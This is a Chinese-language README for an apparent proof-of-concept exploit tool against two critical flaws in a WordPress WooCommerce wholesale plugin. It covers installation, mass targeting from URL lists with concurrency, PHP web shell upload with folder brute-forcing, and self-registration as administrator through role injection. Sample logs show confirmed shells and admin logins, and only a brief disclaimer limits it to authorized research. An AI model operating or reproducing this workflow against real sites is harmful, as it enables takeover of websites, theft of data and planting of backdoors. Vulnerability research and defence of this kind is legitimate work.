## 🔴 漏洞概述 ### CVE-2026-27542 — 未认证权限提升 | 字段 | 详情 | |---|---| | **CVE ID** | CVE-2026-27542 | | **严重性** | **CRITICAL** — CVSS v3.1 分数: **9.8** | | **攻击向量** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` | | **受影响组件** | WordPress 的 WooCommerce Wholesale Lead Capture 插件 | | **漏洞类型** | 未认证权限提升 | | **是否需要认证** | 无 | | **CWE** | CWE-269: 不当权限管理 | **描述：** WordPress 的 WooCommerce Wholesale Lead Capture 插件在所有已知受影响版本中均存在未认证权限提升漏洞。漏洞存在于 `wwlc_create_user` AJAX 动作处理程序中，该处理程序在处理用户注册请求时未充分对用户提交的角色字段进行清理或验证。远程未认证攻击者可以构造一个特制的 POST 请求，在账户创建时直接将任意 WordPress 能力字段（包括 `wp_capabilities[administrator]`）注入用户元数据。这使得攻击者无需任何先验认证或与合法用户的交互即可注册为 WordPress 管理员，从而导致受影响 WordPress 安装的完全沦陷。 ### CVE-2026-27540 — 未认证任意文件上传 | 字段 | 详情 | |---|---| | **CVE ID** | CVE-2026-27540 | | **严重性** | **CRITICAL** — CVSS v3.1 分数: **9.8** | | **攻击向量** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` | | **受影响组件** | WordPress 的 WooCommerce Wholesale Lead Capture 插件 | | **漏洞类型** | 未认证任意文件上传（导致远程代码执行） | | **是否需要认证** | 无 | | **CWE** | CWE-434: 不限制上传危险类型的文件 | **描述：** WordPress 的 WooCommerce Wholesale Lead Capture 插件在所有已知受影响版本中均存在未认证任意文件上传漏洞。漏洞存在于 `wwlc_file_upload_handler` AJAX 动作中，该动作在未进行任何认证或一次性令牌验证的情况下注册。通过向 `/wp-admin/admin-ajax.php` 提交特制的 multipart POST 请求，远程未认证攻击者可以上传任意类型的文件（包括 PHP Web Shell）到服务器的 `wp-content/uploads/` 目录下的动态生成的 `wwlc-temp-*` 子目录中。成功利用将导致在以 Web 进程用户身份运行的后台服务器上实现**远程代码执行（RCE）**。 ## 🛠️ 工具描述 这是一个针对上述两个严重漏洞的**概念验证（PoC）利用脚本**，用于攻击运行 **WooCommerce Wholesale Lead Capture** 插件的 WordPress 安装。该工具支持两种独立的攻击模式： | 模式 | 攻击类型 | 目标 | |---|---|---| | **模式 1** | 未认证任意文件上传 + 文件夹暴力破解 | 上传 PHP Web Shell 并通过多层文件夹猜测定位它 | | **模式 2** | 通过注册进行未认证权限提升 | 自注册为 WordPress 管理员并验证管理员权限 | ## 📋 系统要求 ### 系统需求 - Python **3.8** 或更高版本 - 可访问目标站点的互联网连接 - Linux / Windows / macOS ### Python 依赖 ``` pip install requests urllib3 colorama ``` 或通过 requirements 文件安装： ``` pip install -r requirements.txt ``` **`requirements.txt`：** ``` requests>=2.28.0 urllib3>=1.26.0 colorama>=0.4.6 ``` ## 🚀 安装 ``` # 克隆仓库 git clone https://github.com/Nxploited/CVE-2026-27542-CVE-2026-27540.git cd CVE-2026-27542-CVE-2026-27540 # 安装依赖 pip install -r requirements.txt # 运行工具 python3 CVE-2026-27542_CVE-2026-27540.py ``` ## ⚙️ 使用方法 ### 基本运行 ``` python3 CVE-2026-27542_CVE-2026-27540.py ``` 该工具会显示一个交互式终端界面，并提示输入所有必需参数。 ### 🗂️ 目标列表格式 创建一个纯文本文件（例如 `list.txt`），每行包含一个目标 URL： ``` https://target1.com https://target2.com http://target3.com/wordpress ``` ### 🔴 模式 1 — 文件上传 + 文件夹暴力破解 ``` Select mode [1=Upload+Folder, 2=Registration+Admin]: 1 Targets list file (one URL per line) [list.txt]: list.txt Threads (concurrent sites) [3]: 5 HTTP timeout (seconds) [10]: 10 Shell file path [shell.php]: shell.php Shell signature (marker inside shell) [Nx_SHELL_SIGNATURE]: Nx_SHELL_SIGNATURE Max pattern-based folder guesses per site [50000]: 50000 Max time-based folder guesses per site [50000]: 50000 Max random-hex folder guesses per site [100000]: 100000 Upload results file [scan_results/wwlc_uploads.txt]: scan_results/wwlc_uploads.txt Found shells file [scan_results/wwlc_shells_found.txt]: scan_results/wwlc_shells_found.txt ``` **Shell 文件示例（`shell.php`）：** ``` ``` ### 🟠 模式 2 — 注册 + 角色注入 + 管理员验证 ``` Select mode [1=Upload+Folder, 2=Registration+Admin]: 2 Targets list file (one URL per line) [list.txt]: list.txt Threads (concurrent sites) [3]: 5 HTTP timeout (seconds) [10]: 10 Base registration username (prefix) [Nx_admin]: Nx_admin Base registration email [nx_admin@example.com]: nx_admin@example.com Registration results file [scan_results/wwlc_register_results.txt]: Admin hits file [scan_results/Admin_login.txt]: ``` 该工具会： 1. 发现 WWLC 注册表单并提取有效的 nonce 2. 提交注入 `administrator` 角色的伪造注册载荷 3. 尝试使用创建的凭据登录 4. 验证多个 WordPress 管理员端点的访问权限 5. 将确认的管理员访问结果保存到输出文件 ## 📁 输出文件 | 文件 | 描述 | |---|---| | `scan_results/wwlc_uploads.txt` | 文件上传成功（模式 1）的所有站点 | | `scan_results/wwlc_shells_found.txt` | 已确认可访问的完整 Shell URL（模式 1） | | `scan_results/wwlc_register_results.txt` | 注册尝试结果及凭据（模式 2） | | `scan_results/Admin_login.txt` | 已确认的管理员登录凭据（模式 2） | ### 模式 2 — 管理员命中示例 ``` [INFO] Mode2 | Target: https://target.com [SUCCESS] https://target.com | nonce found on /wholesale-register/: a1b2c3d4e5 [INFO] https://target.com | using discovered nonce [SUCCESS] https://target.com | registration success for user=Nx_admin_x7k2 [SUCCESS] https://target.com | ADMIN login confirmed as Nx_admin_x7k2 ``` ### 模式 1 — Shell 发现示例 ``` [INFO] Mode1 | Target: https://target.com [INFO] https://target.com | upload HTTP time: 0.847s [SUCCESS] https://target.com | upload success file_name=shell_abc123.php [INFO] https://target.com | pattern brute-force (50003 guesses) [SUCCESS] https://target.com | shell FOUND via pattern: https://target.com/wp-content/uploads/wwlc-temp-00000123/shell_abc123.php [INFO] https://target.com | folder scan stats: attempts=123, time=4.213s, rate=29.2 req/s ``` ## 📡 联系与作者

By: Nxploited (Khaled Alenazi)

 

## ⚠️ 法律声明

_{© 2026 Nxploited (Khaled Alenazi) — 仅限授权安全研究使用。}

标签：CVE-2026-27540, CVE-2026-27542, CWE-269, Exploit, PoC, Privilege Escalation, Unauthenticated Arbitrary File Upload, Unauthenticated Privilege Escalation, WooCommerce, WordPress, WordPress插件, 协议分析, 批发, 插件安全, 文件上传, 无服务器架构, 暴力破解, 未认证, 权限提升, 漏洞, 管理员角色, 线索捕获, 编程工具, 网络安全, 能力注入, 远程代码执行, 逆向工具, 隐私保护